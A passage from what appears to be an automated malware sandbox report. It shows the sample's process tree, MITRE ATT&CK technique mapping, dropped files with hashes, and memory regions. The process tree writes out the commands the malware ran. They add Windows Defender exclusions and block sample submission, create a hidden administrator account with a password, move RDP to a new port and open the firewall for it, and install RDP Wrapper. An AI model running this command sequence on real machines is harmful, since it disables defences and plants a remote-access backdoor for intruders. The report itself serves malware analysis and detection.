                                                  powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2596
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1904
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1248
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2516
                                                • C:\Windows\system32\timeout.exe
                                                  Timeout /t 15
                                                  4⤵
                                                  • Delays execution with timeout.exe
                                                  PID:1380
                                            • C:\Windows\System32\WScript.exe
                                              C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\725.vbs" VXpBeFVsQllVazlUVjNCTFVrVktSVkZYT0cxaU0zQlRZV294YzJSSE9URlpWazV1Vkd4U1NrcHNRblZWVlhoMldqQkpPV1Y2ClRYaFBSRlY1VG10WmQweFZSVE5PYWsxMENrNUVaM2hSYVRGRFVWVlNSMHhVYTNoTmEwWkZVa1JaZDA1VVkzbFNiakE5
                                              2⤵
                                              • Blocklisted process makes network request
                                              PID:920
                                            • C:\Windows\System32\WScript.exe
                                              C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\wkDUDQc\561.vbs" tNIjJDBDAo ltouaSgNTI "C:\Users\Admin\AppData\Roaming\wkDUDQc\eUzTHpvr.bat"
                                              2⤵
                                                PID:540
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\wkDUDQc\eUzTHpvr.bat
                                                  3⤵
                                                  • Drops file in System32 directory
                                                  PID:1488
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                                                    4⤵
                                                      PID:1360
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic group where sid="S-1-5-32-544" get name /value
                                                        5⤵
                                                          PID:2576
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                                                        4⤵
                                                          PID:1216
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic group where sid="S-1-5-32-555" get name /value
                                                            5⤵
                                                              PID:2148
                                                          • C:\Windows\system32\net.exe
                                                            net user tNIjJDBDAo ltouaSgNTI /add
                                                            4⤵
                                                              PID:2476
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user tNIjJDBDAo ltouaSgNTI /add
                                                                5⤵
                                                                  PID:1064
                                                              • C:\Windows\system32\net.exe
                                                                net localgroup Administrators tNIjJDBDAo /add
                                                                4⤵
                                                                  PID:2068
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 localgroup Administrators tNIjJDBDAo /add
                                                                    5⤵
                                                                      PID:300
                                                                  • C:\Windows\system32\net.exe
                                                                    net localgroup Remote Desktop Users tNIjJDBDAo /add
                                                                    4⤵
                                                                      PID:2932
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 localgroup Remote Desktop Users tNIjJDBDAo /add
                                                                        5⤵
                                                                          PID:2104
                                                                      • C:\Windows\system32\net.exe
                                                                        net accounts /maxpwage:unlimited
                                                                        4⤵
                                                                          PID:1280
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                            5⤵
                                                                              PID:1820
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v tNIjJDBDAo /t REG_DWORD /d "00000000" /f
                                                                            4⤵
                                                                            • Hide Artifacts: Hidden Users
                                                                            PID:2260
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                                                                            4⤵
                                                                              PID:2984
                                                                            • C:\Windows\system32\netsh.exe
                                                                              netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                                                                              4⤵
                                                                              • Modifies Windows Firewall
                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                              PID:2700
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2936
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1892
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1536
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2296
                                                                            • C:\Windows\system32\timeout.exe
                                                                              Timeout /t 15
                                                                              4⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:1696
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService
                                                                        1⤵
                                                                        • Loads dropped DLL
                                                                        • Drops file in System32 directory
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious behavior: LoadsDriver
                                                                        PID:3040

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Reconnaissance

                                                                      Resource Development

                                                                      Initial Access

                                                                      Execution

                                                                      Command and Scripting Interpreter

                                                                      1
                                                                      T1059

                                                                      PowerShell

                                                                      1
                                                                      T1059.001

                                                                      Scheduled Task/Job

                                                                      1
                                                                      T1053

                                                                      Scheduled Task

                                                                      1
                                                                      T1053.005

                                                                      Persistence

                                                                      Account Manipulation

                                                                      1
                                                                      T1098

                                                                      Boot or Logon Autostart Execution

                                                                      1
                                                                      T1547

                                                                      Winlogon Helper DLL

                                                                      1
                                                                      T1547.004

                                                                      Create or Modify System Process

                                                                      1
                                                                      T1543

                                                                      Windows Service

                                                                      1
                                                                      T1543.003

                                                                      Event Triggered Execution

                                                                      1
                                                                      T1546

                                                                      Netsh Helper DLL

                                                                      1
                                                                      T1546.007

                                                                      Scheduled Task/Job

                                                                      1
                                                                      T1053

                                                                      Scheduled Task

                                                                      1
                                                                      T1053.005

                                                                      Server Software Component

                                                                      1
                                                                      T1505

                                                                      Terminal Services DLL

                                                                      1
                                                                      T1505.005

                                                                      Privilege Escalation

                                                                      Account Manipulation

                                                                      1
                                                                      T1098

                                                                      Boot or Logon Autostart Execution

                                                                      1
                                                                      T1547

                                                                      Winlogon Helper DLL

                                                                      1
                                                                      T1547.004

                                                                      Create or Modify System Process

                                                                      1
                                                                      T1543

                                                                      Windows Service

                                                                      1
                                                                      T1543.003

                                                                      Event Triggered Execution

                                                                      1
                                                                      T1546

                                                                      Netsh Helper DLL

                                                                      1
                                                                      T1546.007

                                                                      Scheduled Task/Job

                                                                      1
                                                                      T1053

                                                                      Scheduled Task

                                                                      1
                                                                      T1053.005

                                                                      Defense Evasion

                                                                      Hide Artifacts

                                                                      1
                                                                      T1564

                                                                      Hidden Users

                                                                      1
                                                                      T1564.002

                                                                      Impair Defenses

                                                                      1
                                                                      T1562

                                                                      Disable or Modify System Firewall

                                                                      1
                                                                      T1562.004

                                                                      Modify Registry

                                                                      1
                                                                      T1112

                                                                      Credential Access

                                                                      Credentials from Password Stores

                                                                      1
                                                                      T1555

                                                                      Credentials from Web Browsers

                                                                      1
                                                                      T1555.003

                                                                      Unsecured Credentials

                                                                      1
                                                                      T1552

                                                                      Credentials In Files

                                                                      1
                                                                      T1552.001

                                                                      Discovery

                                                                      Password Policy Discovery

                                                                      1
                                                                      T1201

                                                                      Permission Groups Discovery

                                                                      1
                                                                      T1069

                                                                      Local Groups

                                                                      1
                                                                      T1069.001

                                                                      Remote System Discovery

                                                                      1
                                                                      T1018

                                                                      System Information Discovery

                                                                      1
                                                                      T1082

                                                                      System Location Discovery

                                                                      1
                                                                      T1614

                                                                      System Language Discovery

                                                                      1
                                                                      T1614.001

                                                                      System Network Configuration Discovery

                                                                      1
                                                                      T1016

                                                                      Internet Connection Discovery

                                                                      1
                                                                      T1016.001

                                                                      Lateral Movement

                                                                      Remote Service Session Hijacking

                                                                      1
                                                                      T1563

                                                                      RDP Hijacking

                                                                      1
                                                                      T1563.002

                                                                      Remote Services

                                                                      1
                                                                      T1021

                                                                      Remote Desktop Protocol

                                                                      1
                                                                      T1021.001

                                                                      Collection

                                                                      Data from Local System

                                                                      1
                                                                      T1005

                                                                      Command and Control

                                                                      Web Service

                                                                      1
                                                                      T1102

                                                                      Exfiltration

                                                                      Impact

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Program Files\RDP Wrapper\rdpwrap.bat
                                                                        Filesize

                                                                        12KB

                                                                        MD5

                                                                        b365fde3be7855f4254d1e4bba45d260

                                                                        SHA1

                                                                        b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

                                                                        SHA256

                                                                        2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

                                                                        SHA512

                                                                        d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Temp\CabB6F2.tmp
                                                                        Filesize

                                                                        70KB

                                                                        MD5

                                                                        49aebf8cbd62d92ac215b2923fb1b9f5

                                                                        SHA1

                                                                        1723be06719828dda65ad804298d0431f6aff976

                                                                        SHA256

                                                                        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                        SHA512

                                                                        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Temp\TarB714.tmp
                                                                        Filesize

                                                                        181KB

                                                                        MD5

                                                                        4ea6026cf93ec6338144661bf1202cd1

                                                                        SHA1

                                                                        a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                        SHA256

                                                                        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                        SHA512

                                                                        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        Filesize

                                                                        7KB

                                                                        MD5

                                                                        3222338061c0957c75e8663b71118841

                                                                        SHA1

                                                                        774e3d1abf6bd82d04bb9bbbde72ce6dabeb8a1f

                                                                        SHA256

                                                                        5916b908d41ee7cfc4c3eaf495cb9ee750555a3f806a00a411fbf2503e1e8b50

                                                                        SHA512

                                                                        e87439b6c2f9b0ff3d3aba82ae35712d48fed935b9906be45a585d0d3bbfda2009042be811aa83c52fd99b5f011c1f661c6f15cd44a453736570418813446853

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                        Filesize

                                                                        7KB

                                                                        MD5

                                                                        ae8d8f31370b5b3a563b72e0c8cffa59

                                                                        SHA1

                                                                        084595c14ce9ebdb8183fce193fee30fe930f2a5

                                                                        SHA256

                                                                        c6c302e26404b22061097c191c003fda33ea941a276372fc67f78e80eaa44da7

                                                                        SHA512

                                                                        56f3aa0585425ee70131befebc07570b49fa3aa44cb769ade6689b8d1b020604b110310e7b77d466e5d17b7f68152be03d8e84f43f3e21448a8cb34c0e097506

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\A
                                                                        Filesize

                                                                        1.0MB

                                                                        MD5

                                                                        e8b84f9aae8f56157bab0cb0ca34fe45

                                                                        SHA1

                                                                        08f3fae0a026c59d42d698eeceb2cde4cb5cc83e

                                                                        SHA256

                                                                        276c2faaae669568b7655862d1aa85c7b711df06a4bea1cce5f6f5578d9d440e

                                                                        SHA512

                                                                        03d80a1a53daa470f6a684f84609b3f744e524300fb6f7e693f0d102bd77ac1d140da200cb4b3df86e0477826bbd7eaba10a8e10d68b6ce378b55384cb18430a

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
                                                                        Filesize

                                                                        921KB

                                                                        MD5

                                                                        78ba0653a340bac5ff152b21a83626cc

                                                                        SHA1

                                                                        b12da9cb5d024555405040e65ad89d16ae749502

                                                                        SHA256

                                                                        05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

                                                                        SHA512

                                                                        efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Facilita.xltx
                                                                        Filesize

                                                                        1.9MB

                                                                        MD5

                                                                        f07ba54d61e8ecd234cfc29dbd63c082

                                                                        SHA1

                                                                        2959ab5302060059db4c12af0ff9aa5c8d060499

                                                                        SHA256

                                                                        17b8e05da75af68ae79999fb70d3031cbfc92ffaa6862e8b6bb6f9cee11a100a

                                                                        SHA512

                                                                        b4ab41d0c0d26b79418a96a926217540e6c784fa87f6625416c39280245773ddf3c84c671fc5e1a9a79a628b12b79c09f34e4ca50fdded172b1add790c3f5864

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\G
                                                                        Filesize

                                                                        1.1MB

                                                                        MD5

                                                                        1cbc6a4ec6699390f807eaca769b9e9e

                                                                        SHA1

                                                                        265b0640a35ce9a161ec4c0cad5142d5cf7e9feb

                                                                        SHA256

                                                                        747cfe4985ce5203e973f9be6ac7e43c6980babcb7203f1c989469670feec350

                                                                        SHA512

                                                                        19fcba9aa6fa052c7ef032f694313b153835a78bbc7072b54f41f3ef9c8985a70b67c7de968312793c2a644d55411f0a058aab955945322069191b746ca44b47

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Mio.xltx
                                                                        Filesize

                                                                        921KB

                                                                        MD5

                                                                        a2a838e2b4d650fc8f8f59408183684a

                                                                        SHA1

                                                                        90c5b4ed3cb75b7ce6d3fb201d53bcb83fc812a1

                                                                        SHA256

                                                                        ad7dc09b1a02ac60bc7fca76a294dfa5499af0ba7a840ff845c042cbac875e57

                                                                        SHA512

                                                                        226dd3f5697759bed3926483966b0e71287526dd2308a460239e6cc215dce20a4bb06505969c30efbea5000c135bc2c3eb5b6b1bdb6a17b6cb748e9783336027

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Rimasta.xltx
                                                                        Filesize

                                                                        138KB

                                                                        MD5

                                                                        6dfb1c72ba137b2aa256907636a86427

                                                                        SHA1

                                                                        df8349a7e235ab63920ede1ba662628e2ec3b9e1

                                                                        SHA256

                                                                        bd439ef1861dbad75461d95f2ced0e3a6ae9fd776b51fab9f5717444fd89d3ab

                                                                        SHA512

                                                                        7298f2db3485a48de49645e7deeb1f413e16d3f4f01c96ddc1599be65465d66918c36b7f95db167b67bc03b2b60564dc9437da6aa798ac2a9842d88bfe4b01db

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Solitario.xltx
                                                                        Filesize

                                                                        389KB

                                                                        MD5

                                                                        d3394e00792e6cddadf23ad7e89629f6

                                                                        SHA1

                                                                        e36e73c357ff01cb184fa477c0f2957a21bbac00

                                                                        SHA256

                                                                        71d98c2ccab23a0bf3701d9e3758d40b152309f96d97d83388663f2985a67e04

                                                                        SHA512

                                                                        ebd7107dddfa14eb73d3f36e124dd253ad4a7fe11a2b425205ad08a236061e614536622924a5b28bdf5212c10202d0b8b6f4d0040e9a6fba3391d0a1f244707b

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Viso.xltx
                                                                        Filesize

                                                                        88KB

                                                                        MD5

                                                                        8fb8bc2a52e6514fcd7c481e3d2c5a19

                                                                        SHA1

                                                                        b214c89d3960f7c67fe76a55839e6da7342c6b20

                                                                        SHA256

                                                                        f7dc64367911ef5e81f3bfb586bb0ffa24e2d2fb19f845b2c1fba6c84ca6006e

                                                                        SHA512

                                                                        4cc02e9a48decb29c927bc2bcc800576370db96573757e1164e6133641641d5edd10f7be01cf7cf7ee6840cfe445e9ab6debfdea60b623950abb2f8a1373fb37

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Z
                                                                        Filesize

                                                                        1.0MB

                                                                        MD5

                                                                        6c1b9b74d09b572db467629a0e4d3eec

                                                                        SHA1

                                                                        a38508ddc0d932690f416532ddbd32ee4375b164

                                                                        SHA256

                                                                        70b96681d633c392bd6b2782128ee018bbe2eedb1ab565784db6016f1401f609

                                                                        SHA512

                                                                        3515105e577255827e26b28bbcd79219bf5598809d526481b34dcb645bb54827d7680b2ee9cb82036cfefbc636211b66f73efc63a9a99e09cbb45ffbf5230b5c

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\wkDUDQc\1155.vbs
                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        fdc134c640049724853a14b692623719

                                                                        SHA1

                                                                        500ff9c4e30c34e4ab0ac0ce7c32e5f9116020a5

                                                                        SHA256

                                                                        dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00

                                                                        SHA512

                                                                        1b34d84d77cad63d69fcae45735c3616ff6bcac2176bfef1ce4e6d08f4bffa98a48aaa036b3f9674d516d923a353bc339290f7204436de9971e7b2ebf60f407f

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\wkDUDQc\316.vbs
                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        d427d2ed9db86d08b38f5f8b5eec4493

                                                                        SHA1

                                                                        5cfe9f751bad99009abf1a642eec8f7c67870051

                                                                        SHA256

                                                                        7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512

                                                                        SHA512

                                                                        fc381ec4b2dcdfd10d55d5d317e7a6011da9a859a7e98a84d49391637aa22eaf983875c9bf5bad8403b006566d4053d8f8946d3cbd52a433eac60c26f73cf659

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\wkDUDQc\54.vbs
                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        193242114c1738d0ea04aa93659fdd5a

                                                                        SHA1

                                                                        a929cc1cfbe44ba8a99117dfd7819776ab45d465

                                                                        SHA256

                                                                        c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

                                                                        SHA512

                                                                        46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\wkDUDQc\561.vbs
                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        0884b6e1aaf279208fe5f97cbfa85276

                                                                        SHA1

                                                                        388f310a0d62a3362db22659e93cb6cb517c21b8

                                                                        SHA256

                                                                        490c84854174fa43f15d9ca2967578ed5aa614f5327ccccb5cb6ba589db3aeb6

                                                                        SHA512

                                                                        68d515e3660306e7e6c7a5661b41232e6a19788ef05d614962f64873056dcc8a5489c4d1ac22ad2e3f632d6c4e7497a40d0511527f0ac1a8e0dff7366731eead

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll
                                                                        Filesize

                                                                        942B

                                                                        MD5

                                                                        b028caeaaf19701bef75226cb6e70647

                                                                        SHA1

                                                                        a9f5b8c85ad2d3cf375be93c146ad9d5686d829d

                                                                        SHA256

                                                                        e169c5133e79677be99cff9b1e97af05a5ede7761244a8ad0e6547505f394527

                                                                        SHA512

                                                                        2caa038543e6948a796a1e9292c1e5ca01bccf9d5102da4060336817fd07441dc3625fade10ba80aed612af8b9f4912aa7cea385fc3d1bad17a5598d6e85df2f

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\wkDUDQc\Nqb.dll
                                                                        Filesize

                                                                        837B

                                                                        MD5

                                                                        3bce44f79559aacbbe22f962baaab069

                                                                        SHA1

                                                                        5235023d045135f78bfbe476f107fd3ff0db7646

                                                                        SHA256

                                                                        fe527b196dd691f717843295b0bf578c5ad3a72ad279a82ab3d6dbfbf9213fc7

                                                                        SHA512

                                                                        d20772d782b66c2e5073ca837f9f0e7968d16a9de94e94ac8145f9462cf5676dae129c913509545eb4421b2a9dff8357697dd384f97e70ad324a7f114f7ff247

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\wkDUDQc\eUzTHpvr.bat
                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        56ad11c68105f4923f30e0a82c63cc7e

                                                                        SHA1

                                                                        e48a22e2d127b477f842b9c638a27ffcaf1712ab

                                                                        SHA256

                                                                        fa088d3760a919c01e05897eaa9b5313be8f0911808c4598a036f9fa746d2387

                                                                        SHA512

                                                                        de5fa9f2cc12fcd533119d7b4d5c144dbe349d0b044916bf8a9690b4bb351501765c4c4784aa51469b21097822f316dcb2bf365f6ceafb18c17bc494734c8359

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Roaming\wkDUDQc\xFtusaUtcN.bat
                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        6d19b2702b77a20b89818484cbc83506

                                                                        SHA1

                                                                        f42dbd3ab3c60ea9952e2a0f66826e153f89d943

                                                                        SHA256

                                                                        042ef6e3349edef436e425a5ec5d7c23f49a93f2866ae31c10ada08e9e012d5f

                                                                        SHA512

                                                                        184e47c8aaa2e8a391e08ba2c5932c6a16b620303c4c985df9e149770a866e8e3948a027150070044cdb56adfb11ad8b8cbd5979e78a0fbf444868cab9b4a285

                                                                        Download Submit

                                                                      • C:\Windows\System32\catroot2\edb.log
                                                                        Filesize

                                                                        64KB

                                                                        MD5

                                                                        d0676459e58371886fa59ef5456073f9

                                                                        SHA1

                                                                        32eaa3ef9d48cfb92ee7678a874c562665b93572

                                                                        SHA256

                                                                        d26634e260197ead7d38f3ab3ebb1cbc4926bdab6574e4974f01a89e44f2cb47

                                                                        SHA512

                                                                        44ae9dcb5df2d03d206f56fc8906b1bec707df6a78be638d675b7e9ff672a10e8e701c16ebb146df7e4296b4cbc9258491e97406d77cdbdac75484ea0aa86bb9

                                                                        Download Submit

                                                                      • C:\Windows\System32\null
                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        5c71ae0787879815eb87f09681318af8

                                                                        SHA1

                                                                        9e871e0dede90dc307493906f6a850ac561d3696

                                                                        SHA256

                                                                        40fd74927496d7655999d15e71f2768115c9089fce029d6e2fb50878ba262cef

                                                                        SHA512

                                                                        eebe76d7a79f2f6c9c282f36d242bc8f219dd7f2fed87af589eb7f0540c3411e112ac74264461041291267252c0d1b33ee25d04ec8579b3139dd66f777aff008

                                                                        Download Submit

                                                                      • C:\Windows\System32\null
                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        5ae53270baf6ce397d00dd09ec0075b2

                                                                        SHA1

                                                                        63e1c3d429d1faa2ea2f7d62175995e6d9b78dbc

                                                                        SHA256

                                                                        0d55e1ab1507f3aba7182d006dd8ead3be6eb4123390d874e40f6a8100d5b20f

                                                                        SHA512

                                                                        adbc7007356a678b8de1fe790d849f791cca54e06d181c19ad3879266fedb3b268ad0e122cadc60d414beb0c126fa2168e3db34dc908f90350ac3cba22696cc3

                                                                        Download Submit

                                                                      • \Program Files\RDP Wrapper\RDPWInst.exe
                                                                        Filesize

                                                                        1.4MB

                                                                        MD5

                                                                        3288c284561055044c489567fd630ac2

                                                                        SHA1

                                                                        11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                        SHA256

                                                                        ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                        SHA512

                                                                        c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                        Download Submit

                                                                      • \Program Files\RDP Wrapper\rdpwrap.dll
                                                                        Filesize

                                                                        114KB

                                                                        MD5

                                                                        461ade40b800ae80a40985594e1ac236

                                                                        SHA1

                                                                        b3892eef846c044a2b0785d54a432b3e93a968c8

                                                                        SHA256

                                                                        798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                                                                        SHA512

                                                                        421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                                        Download Submit

                                                                      • \Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                                                                        Filesize

                                                                        63KB

                                                                        MD5

                                                                        b58b926c3574d28d5b7fdd2ca3ec30d5

                                                                        SHA1

                                                                        d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

                                                                        SHA256

                                                                        6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

                                                                        SHA512

                                                                        b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

                                                                        Download Submit

                                                                      • memory/572-265-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                        Filesize

                                                                        1.4MB

                                                                        Download

                                                                      • memory/784-83-0x0000000000340000-0x000000000052C000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                        Download

                                                                      • memory/784-86-0x0000000000340000-0x000000000052C000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                        Download

                                                                      • memory/784-80-0x0000000000340000-0x000000000052C000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                        Download

                                                                      • memory/784-79-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/784-73-0x0000000000340000-0x000000000052C000-memory.dmp

                                                                        Filesize

                                                                        1.9MB

                                                                        Download

                                                                      • memory/1616-72-0x00000000000C0000-0x0000000000126000-memory.dmp

                                                                        Filesize

                                                                        408KB

                                                                        Download

                                                                      • memory/1616-78-0x00000000000C0000-0x0000000000126000-memory.dmp

                                                                        Filesize

                                                                        408KB

                                                                        Download

                                                                      • memory/1616-74-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/1616-75-0x00000000000C0000-0x0000000000126000-memory.dmp

                                                                        Filesize

                                                                        408KB

                                                                        Download

